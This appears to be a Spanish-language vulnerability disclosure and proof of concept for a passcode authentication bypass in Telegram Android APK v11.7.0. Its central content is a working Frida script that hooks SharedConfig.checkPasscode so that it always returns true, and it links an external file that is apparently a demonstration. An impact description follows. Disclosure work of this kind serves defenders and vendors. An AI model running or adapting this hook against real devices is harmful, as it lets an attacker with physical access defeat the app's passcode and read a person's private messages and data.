
Prueba de concepto basada en Frida que demuestra un bypass de autenticación en Telegram Android APK v11.7.0 mediante el hooking del método SharedConfig.checkPasscode para que siempre devuelva true.
Un problema en la clase SharedConfig de Telegram Android APK v.11.7.0 permite a un atacante físicamente cercano omitir la autenticación y escalar privilegios manipulando el valor de retorno del método checkPasscode.
Omisión de Autenticación
Telegram
Telegram APK Android v.11.7.0
org.telegram.messenger.SharedConfig
Java.perform(function() {
// Locate the SharedConfig class in the target application
var PassCodeActivity = Java.use('org.telegram.messenger.SharedConfig');
// Hook the checkPasscode method to modify its behavior
PassCodeActivity.checkPasscode.implementation = function(passcode) {
// Bypass the actual passcode check by always returning true
return true;
};
});
https://drive.google.com/file/d/1-lW1IQiCyj-8UXZOTedYPGPhQwfMLX4M/view?usp=sharing
Esta vulnerabilidad es un problema de omisión de autenticación del lado del cliente. Afecta a los usuarios que dependen de la función de código de acceso para proteger datos sensibles o restringir el acceso a funcionalidades específicas de la aplicación. Al explotar esta falla, un atacante físicamente cercano puede manipular el proceso de verificación del código de acceso, omitir la autenticación y obtener acceso no autorizado a áreas protegidas de la aplicación. Esto podría llevar a la exposición de datos sensibles del usuario o a acciones no autorizadas dentro de la aplicación.